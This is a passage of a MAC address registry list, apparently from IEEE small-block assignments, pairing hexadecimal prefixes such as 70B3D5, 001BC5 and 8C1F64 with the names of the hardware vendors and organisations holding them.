Electric Motion USA 70B3D52B9 BELECTRIC GmbH 70B3D5F35 carbonTRACK 70B3D5593 Asis Pro 70B3D5CCF Netberg 70B3D5AAA Xemex NV 70B3D536A Becton Dickinson 70B3D51EF ADTEK 70B3D59B6 Intercomp S.p.A. 70B3D56A8 Vitsch Electronics 70B3D5CE5 GridBridge Inc 70B3D5A21 PPI Inc. 70B3D5CD2 TRUMPF Huttinger GmbH + Co. KG, 70B3D58B3 Firefly RFID Solutions 70B3D55AB Sea Air and Land Communications Ltd 70B3D5E0F Vtron Pty Ltd 70B3D5B9E POLSYSTEM SI SP. Z O.O., S.K.A. 70B3D5AAD Bartec GmbH 70B3D5896 Shanghai Longpal Communication Equipment Co., Ltd. 70B3D5349 SLAT 70B3D585B TSUBAKIMOTO CHAIN CO. 70B3D512E GreenFlux 70B3D512C CIELLE S.R.L. 70B3D5885 QuirkLogic 70B3D5FCA M2M Cybernetics Pvt Ltd 70B3D54C5 Moving iMage Technologies LLC 70B3D59FA Ideas srl 70B3D5761 Critical Link LLC 70B3D511C Samriddi Automations Pvt. Ltd. 70B3D51DA Promess Inc. 70B3D555B Procon Electronics Pty Ltd 70B3D5650 GIFAS-ELECTRIC GmbH 70B3D575B Netool LLC 70B3D5147 ROMO Wind A/S 70B3D5906 Aplex Technology Inc. 70B3D5721 Zoe Medical 70B3D5C91 Grossenbacher Systeme AG 70B3D56B5 ART SPA 70B3D50D2 UNMANNED SPA 70B3D565A Aplex Technology Inc. 70B3D57CE Aplex Technology Inc. 70B3D5387 GWF MessSysteme AG 70B3D5396 CTG sp. z o. o. 70B3D5297 Grossenbacher Systeme AG 70B3D5367 Living Water 70B3D57DE Telaeris, Inc. 70B3D5DFF Spanawave Corporation 70B3D54FE WiTagg, Inc 70B3D53A5 KMtronic ltd 70B3D5776 Power Ltd. 70B3D50BD Andium 70B3D5D2B StreamPlay Oy Ltd 70B3D5B72 UB330.net d.o.o. 70B3D58EF Beeper Communications Ltd. 70B3D510A SEASON DESIGN TECHNOLOGY 70B3D5E7E Groupe Citypassenger Inc 70B3D5277 Voltaware Limited 70B3D574F United States Technologies Inc. 70B3D547C Par-Tech, Inc. 70B3D58C5 HMicro Inc 70B3D53F6 Sycomp Electronic GmbH 70B3D5ADE ISAC SRL 70B3D5493 Impulse Networks Pte Ltd 70B3D5FE4 CARE PVT LTD 70B3D5544 Silicon Safe Ltd 70B3D5429 Redco Audio Inc 70B3D512B RIC Electronics 70B3D50FE Vocality International Ltd 70B3D514D 2-Observe 70B3D5216 FLEXTRONICS 70B3D5955 Dynacard Co., Ltd. 70B3D5202 DEUTA-WERKE GmbH 70B3D50B8 Lucas-Nülle GmbH 70B3D5B93 INTERNET PROTOCOLO LOGICA SL 70B3D5592 CRDE 70B3D5FEB Les distributions Multi-Secure incorporee 70B3D56A1 GLIAL TECHNOLOGY 70B3D5895 Integrated Control Corp. 70B3D57F8 Solvera Lynx d.d. 70B3D5EB7 Skreens 70B3D54C4 OOO Research and Production Center "Computer Technologies" 70B3D5E45 Momentum Data Systems 70B3D52FA Toray Medical Co.,Ltd 70B3D55BE CASWA 70B3D513C Detec Systems Ltd 70B3D53CA TTI Ltd 70B3D5F56 VirtualHere Pty. Ltd. 70B3D5148 Power Electronics Espana, S.L. 70B3D5892 ABB 70B3D5EA2 Transportal Solutions Ltd 70B3D5A2E Kokam Co., Ltd 70B3D5F5B A.F.MENSAH, INC 70B3D5AEA BBR Verkehrstechnik GmbH 70B3D5551 infrachip 70B3D5353 Digital Outfit 70B3D5A72 Business Marketers Group, Inc. 70B3D5F6D Qowisio 70B3D50D6 TATTILE SRL 70B3D5B7A MAHLE 70B3D56C7 Becton Dickinson 70B3D5913 Shenzhen Riitek Technology Co.,Ltd 70B3D5654 EMAC, Inc. 70B3D5D70 Rational Production srl Unipersonale 70B3D5CF4 Harbin Cheng Tian Technology Development Co., Ltd. 70B3D5CB6 Kuebrich Ingeniergesellschaft mbh & Co. KG 70B3D5426 Zehnder Group Nederland 70B3D5CC1 BEEcube Inc. 70B3D5522 Syncopated Engineering Inc 70B3D54B9 SHEN ZHEN TTK TECHNOLOGY CO,LTD 70B3D56CD NORTHBOUND NETWORKS PTY. LTD. 70B3D5B7C Electronic Navigation Ltd 70B3D5AF9 Critical Link LLC 70B3D5D5A WyreStorm Technologies Ltd 70B3D5D5B WyreStorm Technologies Ltd 70B3D583C Sinoembed 70B3D5C92 Unitro Fleischmann 70B3D5F57 Aplex Technology Inc. 70B3D5140 Virta Laboratories, Inc. 70B3D513B Sienna Corporation 70B3D518D Foro Tel 70B3D501F SPX Flow Technology BV 70B3D5CA9 Nxcontrol system Co., Ltd. 70B3D5377 Monnit Corporation 70B3D5EDF GridNavigator 70B3D5DCA DSan Corporation 70B3D5C07 ARECO 70B3D58F0 ERAESEEDS co.,ltd. 70B3D5517 ISPHER 70B3D5383 LPA Excil Electronics 70B3D5891 neocontrol soluções em automação 70B3D5328 HIPODROMO DE AGUA CALIENTE SA CV 70B3D5061 IntelliDesign Pty Ltd 70B3D534C GLT Exports Ltd 70B3D5D29 Sportzcast 70B3D57F2 TCI 70B3D5E4B DELTA 70B3D5ECA Transtronic AB 70B3D5BE5 Pantec Engineering AG 70B3D552D Tanaka Electric Industry Co., Ltd. 70B3D5FBB Vena Engineering Corporation 70B3D5088 OptiScan Biomedical Corp. 70B3D5903 Cymtec Ltd 70B3D576D Trimble 70B3D5F54 Revolution Retail Systems 70B3D51AD Techworld Industries Ltd 70B3D5E6D Domus S.C. 70B3D59F2 Acorde Technologies 70B3D503F Elesar Limited 70B3D5F73 ASL Holdings 70B3D50E6 Nasdaq 70B3D5087 Tempus Fugit Consoles bvba 70B3D53D7 Remote Sensing Solutions, Inc. 70B3D51E5 VendNovation LLC 70B3D572D Kron Medidores 70B3D5F01 Software Systems Plus 70B3D545F Cloud4Wi 70B3D5E55 BELT S.r.l. 70B3D5B47 DSIT Solutions LTD 70B3D5789 SEMEX-EngCon GmbH 70B3D52F1 Inspike S.R.L. 70B3D50DF B.E.A. sa 70B3D5208 DSP DESIGN LTD 70B3D5D9C Subinitial LLC 70B3D5823 SP Controls 70B3D5923 eumig industrie-tv GmbH 70B3D5146 3City Electronics 70B3D5435 Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D5B78 HOERMANN GmbH 70B3D5D0A Private 70B3D5C97 CSINFOTEL 70B3D5E4E Midfin Systems 70B3D55A2 Wallner Automation GmbH 70B3D5459 Protium Technologies, Inc. 70B3D5C55 Intelligent Energy Ltd 70B3D591E Creotech Instruments S.A. 70B3D5078 OrbiWise SA 70B3D573E Trident RFID Pty Ltd 70B3D5A4B McKay Brothers LLC 70B3D5C5B ACD Elektronik GmbH 70B3D5EAB APEN GROUP SpA (VAT IT08767740155) 70B3D527D Telenor Connexion AB 70B3D5E90 Getein Biotechnology Co.,ltd 70B3D544E Solace Systems Inc. 70B3D50D7 Russian Telecom Equipment Company 70B3D5B29 WiViCom Co., Ltd. 70B3D5CB8 Verti Tecnologia 70B3D5D48 HEADROOM Broadcast GmbH 70B3D5BEF Sensortech Systems Inc. 70B3D53D2 Imagine Inc. 70B3D5181 Task Sistemas 70B3D536C Sicon srl 70B3D5B24 Datasat Digital Entertainment 70B3D507D PANORAMIC POWER 70B3D558F LSL systems 70B3D5A99 Bandelin electronic GmbH & Co. KG 70B3D5732 TOFWERK AG 70B3D5820 Becker Nachrichtentechnik GmbH 70B3D5610 POLVISION 70B3D577C HUSTY M.Styczen J.Hupert Sp.J. 70B3D5B8F Assembly Contracts Ltd 70B3D5E58 Thurlby Thandar Instruments LTD 70B3D5CFF DTECH Labs, Inc. 70B3D5EC1 Xafax Nederland bv 70B3D5CE7 June Automation Singapore Pte. Ltd. 70B3D5E28 iotec GmbH 70B3D5D3B NimbeLink Corp 70B3D5CF1 LightDec GmbH & Co. KG 70B3D5682 Rosslare Enterprises Limited 70B3D5250 Datum Electronics Limited 70B3D534A PAVO TASARIM ÜRETİM TİC A.Ş. 70B3D595A Sigmann Elektronik GmbH 70B3D557B ELAMAKATO GmbH 70B3D5EB2 Shooter Detection Systems 70B3D5DF3 SPC Bioclinicum 70B3D5C43 Future Skies 70B3D52FD Special Projects Group, Inc 70B3D583B Telefonix Incorporated 70B3D5305 CAITRON Industrial Solutions GmbH 70B3D5B88 ARP Corporation 70B3D5559 Eagle Mountain Technology 70B3D5010 Hanwa Electronic Ind.Co.,Ltd. 70B3D5AB7 SIGLEAD INC 70B3D5DEC Condev-Automation GmbH 70B3D5FDA ACD Elektronik GmbH 70B3D5625 VX Instruments GmbH 70B3D51AC SVP Broadcast Microwave S.L. 70B3D579A Innerspec Technologies Inc. 70B3D551E Fundación Cardiovascular de Colombia 70B3D5CE9 KINEMETRICS 70B3D5090 POWERCRAFT ELECTRONICS PVT. LTD. 70B3D53F1 Olympus NDT Canada 70B3D52F0 Clock-O-Matic 70B3D5C58 RMI Laser LLC 70B3D5D8F Molu Technology Inc., LTD. 70B3D5507 Human Oriented Technology, Inc. 70B3D580F Quickware Eng & Des LLC 70B3D50F0 Avionica 70B3D5EFA NextEra Energy Resources, LLC 70B3D5936 FARO TECHNOLOGIES, INC. 70B3D52A5 Taitotekniikka 70B3D596F 4CAM GmbH 70B3D58CE CORES Corporation 70B3D5346 Ultamation Limited 70B3D5994 KeFF Networks 70B3D5F63 Ars Products 70B3D5F62 FRS GmbH & Co. KG 70B3D5908 Accusonic 70B3D528F Overline Systems 70B3D54C8 Hosokawa Micron Powder Systems 70B3D5FD1 RedRat Ltd 70B3D5308 DSD MICROTECHNOLOGY,INC. 001BC50C1 EREE Electronique 001BC50BC kuwatec, Inc. 001BC50B4 COBAN SRL 001BC50AA Senceive Ltd 001BC50B0 J-D.COM 001BC50A6 Balter Security GmbH 001BC5094 reelyActive 001BC5099 UAB Kitron 001BC508E TrendPoint Systems 001BC507F Hitechlab Inc 001BC507E Bio Molecular System Pty Ltd 001BC5071 Center for E-Commerce Infrastructure Development, The University of Hong Kong 001BC5073 tado GmbH 001BC506D TES Electronic Solutions (I) Pvt. Ltd. 001BC5063 Check-It Solutions Inc 001BC505E Ecomed-Complex 001BC505F Klingenthaler Musikelektronik GmbH 001BC505B konzeptpark GmbH 001BC505A POSTEC DATA SYSTEMS 001BC5051 QQ Navigation AB 001BC504C Rhino Controls Ltd. 001BC5047 PT. Amanindo Nusapadu 001BC5041 DesignA Electronics Limited 001BC503E Daylight Solutions, Inc 001BC503F ELTRADE Ltd 001BC5038 SEED International Ltd. 001BC5037 ITW Reyflex North America 001BC5025 andersen lighting GmbH 001BC5026 DIMEP Sistemas 001BC5019 Dunlop Systems & Components 001BC5004 Intellvisions Software Ltd 001BC500D Advanced Scientific Concepts, Inc. 001BC5001 OpenRB.com, Direct SIA 001BC5014 Private 8C1F64560 Dexter Laundry Inc. 8C1F64263 EPC Power Corporation 8C1F6456F ADETEC SAS 8C1F64499 TIAMA 8C1F6482F AnySignal 8C1F645D9 Opdi-tex GmbH 8C1F649EC Specialized Communications Corp. 8C1F643D5 FRAKO Kondensatoren- und Anlagenbau GmbH 8C1F64EF5 Sigma Defense Systems LLC 8C1F64605 Xacti Corporation 8C1F64E1E Flextronics International Kft 8C1F64061 Micron Systems 8C1F6409D FLEXTRONICS INTERNATIONAL KFT 8C1F64838 DRIMAES INC. 8C1F64AAA Leder Elektronik Design GmbH 8C1F64358 Denso Manufacturing Tennessee 8C1F64797 Alban Giacomo S.p.a. 8C1F64148 CAREHAWK 8C1F64E75 Stercom Power Soltions GmbH 8C1F64334 OutdoorLink 8C1F64648 Gridpulse c.o.o. 8C1F64BB2 Grupo Epelsa S.L. 70B3D52BA Active Brains 8C1F64C42 SD OPTICS 8C1F640FE Indra Heera Technology LLP 8C1F640A4 Dynamic Research, Inc. 8C1F6413F Elsist Srl 8C1F64A70 V-teknik Elektronik AB 8C1F64F63 Quantum Media Systems 70B3D5561 Liberator Pty Ltd 70B3D5F7C Medicomp, Inc 8C1F645CE Packetalk LLC 8C1F64317 Bacancy Systems LLP 70B3D5FFE Private 8C1F6432C Taiko Audio B.V. 8C1F6440D PROFITT Ltd 8C1F64596 RF Code 8C1F64A3B Fujian Satlink Electronics Co., Ltd 8C1F6483D L-signature 8C1F64FA4 China Information Technology Designing &Consulting Institute Co.,Ltd. 8C1F648EB Numa Products LLC 8C1F64DDE Jemac Sweden AB 8C1F64CAB Spyder Controls Corp. 8C1F6490C Cool Air Incorporated 8C1F645E7 HOSCH Gebäude Automation Neue Produkte GmbH 70B3D55BC LAMTEC Mess- und Regeltechnik für Feuerungen GmbH & Co. KG 70B3D5A51 RF Code 8C1F64550 ard sa 8C1F64FD7 Beijing Yahong Century Technology Co., Ltd 8C1F64046 American Fullway Corp. 70B3D5C75 Planet Innovation Products Inc. 8C1F64F79 YUYAMA MFG Co.,Ltd 8C1F6439E Abbott Diagnostics Technologies AS 8C1F64D73 BRS Sistemas Eletrônicos 70B3D540C Tornado Modular Systems 70B3D50C4 TIAMA 70B3D5C4A TIAMA 8C1F6424C Shenzhen Link-All Technolgy Co., Ltd 8C1F649CB Shanghai Sizhong Information Technology Co., Ltd 8C1F646E4 RAB Microfluidics R&D Company Ltd 8C1F64C1E VA SYD 8C1F64653 P5 8C1F6412E inomatic GmbH 8C1F64FE9 ALZAJEL MODERN TELECOMMUNICATION 8C1F6434C Kyushu Keisokki Co.,Ltd. 8C1F6443D Solid State Supplies Ltd 8C1F644AF miniDSP 8C1F648D0 Enerthing GmbH 8C1F648F6 Idneo Technologies S.A.U. 8C1F64402 Integer.pl S.A. 8C1F64BC9 GL TECH CO.,LTD 001BC5008 Dalaj Electro-Telecom 8C1F64AEA INHEMETER Co.,Ltd 8C1F64E12 Pixus Technologies Inc. 8C1F64DFB Bobeesc Co. 8C1F64A83 EkspertStroyProekt 8C1F644E9 EERS GLOBAL TECHNOLOGIES INC. 8C1F640BB InfraChen Technology Co., Ltd. 8C1F648DE Iconet Services 8C1F641D0 MB connect line GmbH Fernwartungssysteme 8C1F64C51 EPC Energy Inc 8C1F645AF Teq Diligent Product Solutions Pvt. Ltd. 8C1F64882 TMY TECHNOLOGY INC. 8C1F64AC3 WAVES SYSTEM 8C1F6407A Flextronics International Kft 8C1F64AC4 comelec 8C1F64764 nanoTRONIX Computing Inc. 8C1F6425C TimeMachines Inc. 8C1F64B2B Rhombus Europe 8C1F64BE8 TECHNOLOGIES BACMOVE INC. 8C1F64F23 IDEX India Pvt Ltd 8C1F64A9C Upstart Power 8C1F641FE Burk Technology 8C1F64A0A Shanghai Wise-Tech Intelligent Technology Co.,Ltd. 8C1F6432F DEUTA Controls GmbH 8C1F647E2 Aaronn Electronic GmbH 8C1F64E94 ZIN TECHNOLOGIES 8C1F640EE Rich Source Precision IND., Co., LTD. 8C1F64B67 M2M craft Co., Ltd. 8C1F64F56 KC5 International Sdn Bhd 70B3D54F8 SICPA SA - GSS 8C1F64825 MTU Aero Engines AG 70B3D5D1E Houston Radar LLC 8C1F6417C Zelp Ltd 8C1F64D53 Gridnt 70B3D5F1F HKC Security Ltd. 8C1F641A7 aelettronica group srl 8C1F64B55 Sanchar Telesystems limited 8C1F64FB4 Thales Nederland BV 70B3D5874 NORTHBOUND NETWORKS PTY. LTD. 8C1F6479B Foerster-Technik GmbH 8C1F64083 Avionica 8C1F643FC STV Electronic GmbH 8C1F64626 CSIRO 8C1F64C05 SkyCell AG 8C1F6494C BCMTECH 8C1F6497C MB connect line GmbH Fernwartungssysteme 8C1F643AC Benison Tech 8C1F64CF4 NT 8C1F64DD7 KST technology 8C1F6473B Fink Zeitsysteme GmbH 8C1F64CAF BRS Sistemas Eletrônicos 8C1F641BD DORLET SAU 8C1F64946 UniJet Co., Ltd. 8C1F6490F BELIMO Automation AG 8C1F64FB5 Bavaria Digital Technik GmbH 8C1F64685 Sanchar Communication Systems 8C1F647AF E VISION INDIA PVT LTD 8C1F64683 SLAT 70B3D5315 Private 8C1F64C3A YUSUR Technology Co., Ltd. 8C1F648F8 HIGHVOLT Prüftechnik 8C1F64625 Stresstech OY 8C1F640AC Patch Technologies, Inc. 8C1F640BE BNB 8C1F64CD3 Pionierkraft GmbH 8C1F64B73 Comm-ence, Inc. 8C1F649FA METRONA-Union GmbH 8C1F64DF8 Wittra Networks AB 8C1F64B92 Neurable 8C1F64FAA Massar Networks 8C1F64737 Vytahy-Vymyslicky s.r.o. 8C1F64BBF Retency 8C1F64D88 University of Geneva - Department of Particle Physics 8C1F64601 Camius 8C1F64FA8 Unitron Systems b.v. 8C1F64D69 ADiCo Corporation 8C1F647DE SOCNOC AI Inc 8C1F64697 Sontay Ltd. 8C1F64F7A SiEngine Technology Co., Ltd. 8C1F6484C AvMap srlu 8C1F64C4C Lumiplan Duhamel 8C1F64E5E BRICKMAKERS GmbH 70B3D5E2F Flextronics International Kft 8C1F64F5C Flextronics International Kft 8C1F64FF4 SMS group GmbH 8C1F64A6D CyberneX Co., Ltd 8C1F642FD Enestone Corporation 8C1F64557 In-lite Design BV 8C1F648E9 Vesperix Corporation 8C1F64AE8 ADETEC SAS 8C1F64634 AML 8C1F6473C REO AG 8C1F64A1B Zilica Limited 8C1F64BD6 NOVA Products GmbH 8C1F64C38 ECO-ADAPT 8C1F6438B Borrell USA Corp 8C1F64A2B WENet Vietnam Joint Stock company 8C1F64EB7 Delta Solutions LLC 8C1F6447A Missing Link Electronics, Inc. 8C1F6481A Gemini Electronics B.V. 8C1F6408F AixControl GmbH 8C1F6465F Astrometric Instruments, Inc. 8C1F64077 Engage Technologies 8C1F64603 Fuku Energy Technology Co., Ltd. 8C1F6435D Security&Best 8C1F64EBF STEAMIQ, Inc. 8C1F647D2 Enlaps 8C1F64A01 Guan Show Technologe Co., Ltd. 8C1F64EFB WARECUBE,INC 8C1F6460A RFENGINE CO., LTD. 8C1F64E7B Dongguan Pengchen Earth Instrument CO. LT 8C1F643C6 Wavestream Corp 8C1F64D13 EYatsko Individual 8C1F6485B Atlantic Pumps Ltd 70B3D5A7A Fluid Management Technology 8C1F646B5 O-Net Communications(Shenzhen)Limited 8C1F64675 Transit Solutions, LLC. 8C1F64BC6 Chengdu ZiChen Time&Frequency Technology Co.,Ltd 70B3D5313 DIEHL Controls 8C1F64521 MP-SENSOR GmbH 8C1F64C71 Yaviar LLC 8C1F648AF Ibeos 8C1F64D44 Monarch Instrument 8C1F645F5 HongSeok Ltd. 8C1F646A8 Bulwark 8C1F644DA DTDS Technology Pte Ltd 8C1F64787 Tabology 8C1F64EB9 KxS Technologies Oy 8C1F64650 L tec Co.,Ltd 70B3D53FB Liberty Reach 70B3D5CCB RealD, Inc. 8C1F64B46 PHYGITALL SOLUÇÕES EM INTERNET DAS COISAS 8C1F64536 BEIJING LXTV TECHNOLOGY CO.,LTD 8C1F64663 mal-tech Technological Solutions Ltd/CRISP 8C1F64ED4 ZHEJIANG CHITIC-SAFEWAY NEW ENERGY TECHNICAL CO.,LTD. 8C1F64385 Multilane Inc 8C1F646C6 FIT 8C1F6425A Wuhan Xingtuxinke ELectronic Co.,Ltd 8C1F64B2C SANMINA ISRAEL MEDICAL SYSTEMS LTD 8C1F64F78 Ternary Research Corporation 8C1F646CD Wuhan Xingtuxinke ELectronic Co.,Ltd 8C1F6453A TPVision Europe B.V 8C1F64086 WEPTECH elektronik GmbH 8C1F64DAE Mainco automotion s.l. 8C1F64EE8 Global Organ Group B.V. 8C1F648C2 Cirrus Systems, Inc. 8C1F6473F UBISCALE 8C1F642F5 Florida R&D Associates LLC 8C1F642E8 Sonora Network Solutions 70B3D5417 Figment Design Laboratories 8C1F6479D Murata Manufacturing Co., Ltd. 8C1F64151 Gogo Business Aviation 8C1F64EEF AiUnion Co.,Ltd 8C1F64AF7 ard sa 8C1F643E0 YPP Corporation 8C1F6479E Accemic Technologies GmbH 8C1F64EF1 BIOTAGE GB LTD 8C1F64296 Roog zhi tong Technology(Beijing) Co.,Ltd 8C1F64E5C Scientific Lightning Solutions 8C1F6483A Grossenbacher Systeme AG 8C1F644C7 SBS SpA 8C1F64AE1 YUYAMA MFG Co.,Ltd 8C1F64370 WOLF Advanced Technology 8C1F64BC0 GS Elektromedizinsiche Geräte G. Stemple GmbH 8C1F64264 BR. Voss Ingenjörsfirma AB 8C1F64856 Garten Automation 8C1F64903 Portrait Displays, Inc. 8C1F64A57 EkspertStroyProekt 8C1F64135 Yuval Fichman 8C1F64549 Brad Technology 8C1F64270 Xi‘an Hangguang Satellite and Control Technology Co.,Ltd 8C1F64B64 GSP Sprachtechnologie GmbH 70B3D5508 INSEVIS GmbH 8C1F64D7E Thales Belgium 70B3D54CD Power Electronics Espana, S.L. 70B3D5223 Research Laboratory of Design Automation, Ltd. 70B3D5D5D SEASONS 4 INC 70B3D59D8 JOLANYEE Technology Co., Ltd. 70B3D5E0E VulcanForms 70B3D5ACE FARHO DOMOTICA SL 70B3D51F6 LinkAV Technology Co., Ltd 70B3D5C71 The Engineerix Group 70B3D5076 Private Enterprise "Scientific and Production Private Enterprise"Sparing-Vist Center"" 70B3D51BC Flextronics International Kft 70B3D57F6 IDZ Ltd 70B3D5D1D Stuyts Engineering Haarlem BV 70B3D58FD sonatest 70B3D55CE IP Devices 70B3D50E2 JESE Ltd 70B3D5452 ITALIANA PONTI RADIO SRL 70B3D5912 VERTEL DIGITAL PRIVATE LIMITED 70B3D5160 European Synchrotron Radiation Facility 70B3D57FA meoENERGY 70B3D5713 Coloet S.r.l. 70B3D59BC Radian Research, Inc. 70B3D55C3 DIC Corporation 70B3D5CAD YUYAMA MFG Co.,Ltd 70B3D55C2 Sono-Tek Corporation 70B3D5E60 Davitor AB 70B3D5CF9 Breas Medical AB 70B3D58C9 Arwin Technology Limited 70B3D56C0 LLC "NTZ "Mekhanotronika" 70B3D5CB5 Atlas Lighting Products 70B3D596C Weble Sàrl 70B3D5CE8 Grossenbacher Systeme AG 70B3D5B01 G.S.D GROUP INC. 70B3D5C6B Herholdt Controls srl 70B3D5EF0 PNETWORKS 70B3D5E62 Eon 70B3D5A79 NOREYA Technology e.U. 70B3D598D Motohaus Powersports Limited 70B3D56CC ARINAX 70B3D504F EVPU Defence a.s. 70B3D55A4 MB connect line GmbH Fernwartungssysteme 70B3D5792 IMMOLAS 70B3D51B0 NAL Research Corporation 70B3D5128 Akse srl 70B3D5CA6 AXING AG 70B3D529E B2cloud lda 70B3D5B2C Elman srl 70B3D5BDB Power Electronics Espana, S.L. 70B3D5ED9 AADONA Communication Pvt Ltd 70B3D5D03 Digitella Inc. 70B3D541C Twoway Communications, Inc. 70B3D54DD Velvac Incorporated 70B3D56AA Intermobility 70B3D5DE9 EkspertStroyProekt LLC 70B3D57AB Microgate Srl 70B3D593C GSP Sprachtechnologie GmbH 70B3D564F GUNMA ELECTRONICS CO LTD 70B3D54C3 EA Elektroautomatik GmbH & Co. KG 70B3D5118 Macromatic Industrial Controls, Inc. 70B3D5D50 Cubic ITS, Inc. dba GRIDSMART Technologies 70B3D53A6 myenergi Ltd 70B3D5621 SERTEC SRL 70B3D58F9 IWS Global Pty Ltd 70B3D5921 QDevil 70B3D5C46 eumig industrie-TV GmbH. 70B3D5BEB Potter Electric Signal Co. LLC 70B3D5B45 Hon Hai Precision IND.CO.,LTD 70B3D5806 International Super Computer Co., Ltd. 70B3D5883 Contec Americas Inc. 70B3D53D1 Imenco Ltd 70B3D52DF EASTERN SCIENCE & TECHNOLOGY CO., LTD 70B3D5B14 Pantherun Technologies Pvt Ltd 70B3D5EC9 Qlinx Technologies 70B3D5156 Rivercity Innovations Ltd. 70B3D5958 pureLiFi Ltd 70B3D525E RFHIC 70B3D5B86 Hilo 70B3D5BE2 Nocix, LLC 70B3D5E22 Federated Wireless, Inc. 70B3D579C ADDE 70B3D510B SECUREAN CO.,Ltd 70B3D5DC7 NUBURU Inc. 70B3D5F6B DEUTA-WERKE GmbH 70B3D5B0E Servotronix Motion Control 70B3D5B83 Matrix Telematics Limited 70B3D5E87 STACKFORCE GmbH 70B3D52DD Melissa Climate Jsc 70B3D5A8C CYG CONTRON CO.LTD 70B3D5AE8 Innoknight 70B3D5A3E Vigorcloud Co., Ltd. 70B3D534F Royal Engineering Consultancy Private Limited 70B3D5D14 LIGPT 70B3D57C5 Projects Unlimited Inc. 70B3D5567 DogWatch Inc 70B3D5C1E Kron Medidores 70B3D573A DOLBY LABORATORIES, INC. 70B3D5F60 MPM Micro Präzision Marx GmbH 70B3D5157 Shanghai Jupper Technology Co.Ltd 70B3D57F0 YDK Technologies Co.,Ltd 70B3D52FB IK MULTIMEDIA PRODUCTION SRL 70B3D5FC4 AERIAL CAMERA SYSTEMS Ltd 70B3D54A3 TUALCOM ELEKTRONIK A.S. 70B3D5B68 S-Rain Control A/S 70B3D5D96 Thermo Fisher Scientific Inc. 70B3D5BC7 Autonomic Controls, Inc. 70B3D5FC7 Invert Robotics Ltd. 70B3D5B63 Ideas srl 70B3D5424 Underground Systems, Inc. 70B3D52D3 Hensoldt Sensors GmbH 70B3D5D97 BRS Sistemas Eletrônicos 70B3D5F7D 2M Technology 70B3D58BD MAHLE ELECTRONICS, SLU 70B3D5177 Wired Broadcast Ltd 70B3D58F1 Paramount Bed Holdings Co., Ltd. 70B3D58DE Indutherm Giesstechnologie GmbH 70B3D59E4 K&A Electronics Inc. 70B3D533D Schneider Electric Motion USA 70B3D5B6F Integra Metering SAS 70B3D5263 AXING AG 70B3D5E73 Zeus Control Systems Ltd 70B3D5ED3 Beijing Lihong Create Co., Ltd. 70B3D53A3 CDS Institute of Management Strategy, Inc. 70B3D529A Profusion Limited 70B3D5657 ID Quantique SA 70B3D5DBA KODENSHI CORP. 70B3D5611 Avionica 70B3D5F4E Hunan Lianzhong Technology Co.,Ltd. 70B3D5291 Sequent AG 70B3D5301 WAYNE ANALYTICS LLC 70B3D53D3 GS Elektromedizinsiche Geräte G. Stemple GmbH 70B3D5C90 Diretta 70B3D530A HongSeok Ltd. 70B3D5F0E TextSpeak Corporation 70B3D56DB Techimp - Altanova group Srl 70B3D5AD3 WARECUBE,INC 70B3D5FC3 myUpTech AB 70B3D5C72 Scharco Elektronik GmbH 70B3D578D AVL DiTEST GmbH 70B3D56D7 MB connect line GmbH Fernwartungssysteme 70B3D5E01 EarTex 70B3D5473 KeyProd 70B3D5B03 Sprintshield d.o.o. 70B3D5D77 Portrait Displays, Inc. 70B3D5601 Tricom Research Inc. 70B3D5F09 Mictrotrac Retsch GmbH 70B3D5EE6 Vaunix Technology Corporation 70B3D5A83 SHENZHEN HUINENGYUAN Technology Co., Ltd 70B3D5B75 Grossenbacher Systeme AG 70B3D5D2A ITsynergy Ltd 70B3D5529 Inventeq B.V. 70B3D5869 chargeBIG 70B3D5C94 Vars Technology 70B3D5641 Burk Technology 70B3D5C09 RCH Vietnam Limited Liability Company 70B3D5F69 Copper Labs, Inc. 70B3D5F9F M.A.C. Solutions (UK) Ltd 70B3D5FB1 TOMEI TSUSHIN KOGYO CO,.LTD 70B3D50DB Cryptotronix LLC 70B3D51E7 DogWatch Inc 70B3D532E A&T Corporation 70B3D502B Scorpion Precision Industry (HK)CO. Ltd. 70B3D51E2 Shenzhen CAMERAY ELECTRONIC CO., LTD 70B3D5E4D Vulcan Wireless Inc. 70B3D5193 ERA TOYS LIMITED 70B3D51D5 MIVO Technology AB 70B3D51C3 Shanghai Tiancheng Communication Technology Corporation 70B3D58F4 ACQUA-SYSTEMS srls 70B3D5074 Orlaco Products B.V. 70B3D50CC ADMiTAS CCTV Taiwan Co. Ltd 70B3D5EA9 Zhuhai Lonl electric Co.,Ltd. 70B3D5B41 T&M Media Pty Ltd 70B3D5282 SAMBO HITECH 70B3D5951 Trident Systems Inc 70B3D5CAF DAVE SRL 70B3D50F9 OOO Research and Production Center "Computer Technologies" 70B3D59A4 Nordmann International GmbH 70B3D5021 HGL Dynamics Ltd 70B3D5BE0 Cognosos, Inc. 70B3D5A3D SMART IN OVATION GmbH 70B3D50C3 Aug. Winkhaus GmbH & Co. KG 70B3D5CA5 PTS Technologies Pte Ltd 70B3D550C Hangzhou landesker digital technology co. LTD 70B3D5843 OOO Research and Production Center "Computer Technologies" 70B3D574B Code Blue Corporation 70B3D5B9F Yuksek Kapasite Radyolink Sistemleri San. ve Tic. A.S. 70B3D50E7 Pure Air Filtration 70B3D550D CT Company 70B3D527E Mettler Toledo 70B3D5BB2 Mettler Toledo 70B3D5CA2 De Haardt bv 70B3D56AE Hangzhou Weimu Technology Co,.Ltd. 70B3D55DF Semacon Business Machines 70B3D512D S.E.I. CO.,LTD. 70B3D5F53 HighTechSystem Co.,Ltd. 70B3D5797 Mitsubishi Electric India Pvt. Ltd. 70B3D59AF Shanghai Brellet Telecommunication Technology Co., Ltd. 70B3D506A Guangdong Centnet Technology Co.,Ltd 70B3D5F20 Ibercomp SA 70B3D526A Talleres de Escoriaza SA 70B3D589D e-Matix Corporation 001BC50AB Evondos Oy 70B3D5B5A GTI Technologies Inc 70B3D5CB9 JSC «SATIS-TL-94» 70B3D5B5E Dynics 70B3D5F3A OOO Research and Production Center "Computer Technologies" 70B3D5662 Icon Industrial Engineering 70B3D5834 NCE Network Consulting Engineering srl 70B3D5EE9 SC3 Automation 70B3D5045 Navaero Avionics AB 70B3D5DD4 ResIOT UBLSOFTWARE SRL 70B3D5C69 AZ-TECHNOLOGY SDN BHD 70B3D549D Shenzhen Chanslink Network Technology Co., Ltd 70B3D57BB Aloxy 70B3D5DD6 Umweltanalytik Holbach GmbH 70B3D56AB ARROW (CHINA) ELECTRONICS TRADING CO., LTD. 70B3D5C76 ELA INNOVATION 70B3D5ACC Schneider Electric Motion USA 70B3D5780 NIDEC LEROY-SOMER 70B3D5064 AB PRECISION (POOLE) LTD 70B3D5438 HBI 